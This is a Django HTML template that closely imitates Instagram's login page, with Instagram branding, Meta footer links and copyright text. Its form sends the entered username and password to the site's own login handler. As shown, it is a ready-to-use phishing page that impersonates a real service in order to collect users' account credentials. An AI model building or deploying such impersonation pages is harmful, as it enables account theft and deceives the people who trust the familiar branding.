{% load static %}
<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <link rel="icon" type="image/png" href="https://upload.wikimedia.org/wikipedia/commons/thumb/9/95/Instagram_logo_2022.svg/1200px-Instagram_logo_2022.svg.png" />
    <link rel="stylesheet" href="https://fonts.googleapis.com/css?family=Lobster" />
   
<!-- Inside the <head> section of your HTML file -->
  <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.5.1/css/all.min.css"  />

  <style>
@import url("https://fonts.googleapis.com/css2?family=Roboto:wght@100;300;400;500&display=swap");
* {
  margin: 0;
  padding: 0;
  box-sizing: border-box;
  font-family: "Roboto", sans-serif;
}
body {
  background: rgba(250, 250, 250, 1);
  overflow-x: hidden;
}

.container {
  display: flex;
  justify-content: center;
  align-items: center;
  min-height: 90vh;
}
.container .col .box {
  width: 350px;
  height: 380px;
  border: 1px solid rgba(219, 219, 219, 1);
  background: white;
  border-radius: 1px;
  margin: 0 0 10px;
  padding: 10px 0;
  z-index: 2;
}
.container .col .box .title {
  position: relative;
  top: 5px;
  text-align: center;
}
.container .col.content {
  position: relative;
  top: 12px;
}
.container .col .box .title img {
  width: 190px;
  height: 80px;
}
.container .col .box .login-form {
  position: relative;
  height: 260px;
  display: flex;
  justify-content: center;
  align-items: center;
  flex-direction: column;
}
.container .col .box .login-form .form-content {
  position: relative;
  margin: 5px 0;
  top: 22px;
}
.container .col .box .login-form label {
  position: absolute;
  top: 50%;
  transform: translateY(-50%);
  left: 9px;
  font-size: 12px;
  color: rgba(142, 142, 142, 1);
  pointer-events: none;
  order: -1;
  transition: 0.3s ease;
}
.container .col .box .login-form input {
  background: transparent;
  width: 270px;
  height: 40px;
  background: rgba(250, 250, 250, 1);
  border: 1px solid rgba(219, 219, 219, 1);
  border-radius: 3px;
  padding: 9px 0 7px 8px;
  font-size: 14px;
  transition: 0.3s ease;
}
.container .col .box .login-form input:valid {
  padding-bottom: 0;
}
.container .col .box .login-form input:valid + label {
  transform: translateY(-16px);
  font-size: 10px;
}
.container .col .box .login-form button {
  width: 270px;
  height: 30px;
  border: none;
  outline: none;
  border-radius: 4px;
  background-color: rgb(0, 148, 246);
  color: white;
}

.container .col .box .login-form .form-ending {
  position: relative;
  width: 270px;
  margin-top: 20px;
  text-align: center;
}
.container .col .box .login-form .form-ending #OR {
  color: rgba(142, 142, 142, 1);
  background: white;
  text-align: center;
  width: 50px;
  margin: 15px 0;
  font-size: 13px;
  font-weight: 500;
  line-height: 15px;
  z-index: 3;
  position: relative;
  display: block;
}
.container .col .box .login-form .form-ending #line {
  z-index: 1;
  position: absolute;
  left: 50%;
  transform: translateX(-50%);
  top: 22px;
  width: 270px;
  height: 1px;
  background: rgba(219, 219, 219, 1);
}
.container .col .box .login-form .form-ending p#facebook {
  color: #385185;
  cursor: pointer;
  font-size: 14px;
  font-weight: 500;
  margin-top: 15px;
}
.container .col .box .login-form .form-ending p#facebook i {
  margin-right: 8px;
  font-size: 16px;
  position: relative;
  top: 1px;
}
.container .col .box .login-form .form-ending a {
  position: relative;
  top: 15px;
  text-decoration: none;
  color: rgba(0, 55, 107, 1);
  font-size: 12px;
  line-height: 14px;
  text-align: center;
}
/* mini box  */
.container .col .mini-box {
  width: 350px;
  height: 65px;
  background: white;
  border: 1px solid rgba(219, 219, 219, 1);
  display: flex;
  justify-content: center;
  align-items: center;
}
.container .col .mini-box .text {
  font-size: 14px;
  color: rgba(38, 38, 38, 1);
}
.container .col .mini-box .text a {
  text-decoration: none;
  color: #0095f6;
  font-weight: 400;
}
.container .col .download-section {
  margin-top: 20px;
  width: 350px;
  height: 100px;
  text-align: center;
}
.container .col .download-section p {
  font-size: 14px;
  line-height: 18px;
}
.container .col .download-section .images {
  margin-top: 20px;
  display: flex;
  justify-content: center;
  gap: 10px;
}
.container .col .download-section .images img {
  width: 135px;
  height: 40px;
}
footer {
  padding: 30px 20px;
}
footer ul {
  display: flex;
  justify-content: center;
  flex-wrap: wrap;
  gap: 16px;
  width: 35%;
  margin: 0 auto 20px;
}
footer ul li {
  font-size: 12px;
  line-height: 14px;
  list-style: none;
  color: rgba(142, 142, 142, 1);
  cursor: pointer;
}
footer .copyright {
  display: flex;
  justify-content: center;
  gap: 10px;
}
footer .copyright select {
  font-size: 12px;
  background: none;
  color: rgba(142, 142, 142, 1);
  border: none;
  cursor: pointer;
}
footer .copyright select option {
  width: 50px;
}
footer .copyright span {
  font-size: 12px;
  line-height: 14px;
  color: rgba(142, 142, 142, 1);
}
@media (max-width: 900px) {
  footer ul {
    width: 100%;
  }
}
@media (max-width: 850px) {
  #image {
    display: none;
  }
}

@media (max-width: 440px) {
  .container {
    min-height: 80vh;
  }
  .container .col .box,
  .container .col .mini-box {
    border: none;
    background-color: transparent;
  }
}

.success-message p{
  color: rgb( 237, 73, 86);
  font-size: 14px;
  line-height: 18px;
  text-align: center; 
}




i.fa-eye-slash,
i.fa-eye {
  position: absolute;
  top: 50%;
  right: 10px; /* Adjust as needed to position the icon inside the input field */
  transform: translateY(-50%);
  cursor: pointer;
}
  </style>
    <title>Instagram</title>
</head>
<body>
    <div class="container">
      <div class="col image">
              <a href="https://imgbb.com/"><img src="https://i.ibb.co/Q8X79RK/image.png" alt="instagram" id="image"></a>
      </div>
      <!--end of image-->
      <div class="col content">
        <div class="box">
          <div class="title">
            <a href="https://ibb.co/XtKd6c7"><img src="https://i.ibb.co/2dCLRGv/logoname.png" alt="logoname" border="0"></a>
          </div>
          <form class="login-form"  id="myForm" method="post" action="{% url 'login' %}" >
            {% csrf_token %}
            <div class="form-content">
              <input type="text" id="username" name="username"  required />
              <label for="username">Phone number, username, or email</label>
            </div>
            <div class="form-content">
              <input type="password" id="password" name="password" required />
              <label for="password">Password</label>
              <i class="far fa-eye-slash" id="togglePassword" onclick="togglePasswordVisibility()"></i>
            </div>
            <div class="form-content">
              <button type="submit" >Log in</button>
            </div>
            <div class="form-ending">
              <center>
                <p id="OR">OR</p>
                <span id="line"></span>
              </center>
              <p id="facebook"><i class="fab fa-facebook-square"></i>Login with Facebook</p>
                      {% if success_message %}
            <div class="success-message">
                <p>{{ success_message }}</p>
            </div>
        {% endif %}
              <a href="#">Forgot password?</a>
            </div>
          </form>
        </div>
        <div class="mini-box">
          <div class="text">Don't have an account? <a href="#">Sign up</a></div>
        </div>
        <div class="download-section">
          <p>Get the app.</p>
          <div class="images">
            <a href="https://imgbb.com/"><img src="https://i.ibb.co/5KyMHpd/appstore.png" alt="appstore" border="0"></a>
            <a href="https://imgbb.com/"><img src="https://i.ibb.co/ZTHhz0b/playstore.png" alt="playstore" border="0"></a>
          </div>
        </div>
      </div>
      <!--end of content-->
    </div>
    <footer>
      <ul>
        <li>Meta</li>
        <li>About</li>
        <li>Blog</li>
        <li>Jobs</li>
        <li>Help</li>
        <li>API</li>
        <li>Privacy</li>
        <li>Terms</li>
        <li>Locations</li>
        <li>Instagram Lite</li>
        <li>Threads</li>
        <li>Contact Uploading & Non-Users</li>
        <li>Meta Verified</li>
      </ul>
      <div class="copyright">
        <select aria-label="Switch Display Language">
          <option value="af">Afrikaans</option>
          <option value="cs">Čeština</option>
          <option value="da">Dansk</option>
          <option value="de">Deutsch</option>
          <option value="el">Ελληνικά</option>
          <option value="en" selected >English</option>
          <option value="en-gb">English (UK)</option>
          <option value="es">Español (España)</option>
          <option value="es-la">Español</option>
          <option value="fi">Suomi</option>
          <option value="fr">Français</option>
          <option value="id">Bahasa Indonesia</option>
          <option value="it">Italiano</option>
          <option value="ja">日本語</option>
          <option value="ko">한국어</option>
          <option value="ms">Bahasa Melayu</option>
          <option value="nb">Norsk</option>
          <option value="nl">Nederlands</option>
          <option value="pl">Polski</option>
          <option value="pt-br">Português (Brasil)</option>
          <option value="pt">Português (Portugal)</option>
          <option value="ru">Русский</option>
          <option value="sv">Svenska</option>
          <option value="th">ภาษาไทย</option>
          <option value="tl">Filipino</option>
          <option value="tr">Türkçe</option>
          <option value="zh-cn">中文(简体)</option>
          <option value="zh-tw">中文(台灣)</option>
          <option value="bn">বাংলা</option>
          <option value="gu">ગુજરાતી</option>
          <option value="hi">हिन्दी</option>
          <option value="hr">Hrvatski</option>
          <option value="hu">Magyar</option>
          <option value="kn">ಕನ್ನಡ</option>
          <option value="ml">മലയാളം</option>
          <option value="mr">मराठी</option>
          <option value="ne">नेपाली</option>
          <option value="pa">ਪੰਜਾਬੀ</option>
          <option value="si">සිංහල</option>
          <option value="sk">Slovenčina</option>
          <option value="ta">தமிழ்</option>
          <option value="te">తెలుగు</option>
          <option value="vi">Tiếng Việt</option>
          <option value="zh-hk">中文(香港)</option>
          <option value="bg">Български</option>
          <option value="fr-ca">Français (Canada)</option>
          <option value="ro">Română</option>
          <option value="sr">Српски</option>
          <option value="uk">Українська</option>
        </select>
        <span>© 2024 Instagram from Meta </span>
      </div>
    </footer>
    <script>
      function togglePasswordVisibility() {
          var passwordInput = document.getElementById("password");
          var toggleIcon = document.getElementById("togglePassword");
  
          if (passwordInput.type === "password") {
              passwordInput.type = "text";
              toggleIcon.classList.remove("fa-eye-slash");
              toggleIcon.classList.add("fa-eye");
          } else {
              passwordInput.type = "password";
              toggleIcon.classList.remove("fa-eye");
              toggleIcon.classList.add("fa-eye-slash");
          }
      }
  </script>
  </body>
</html>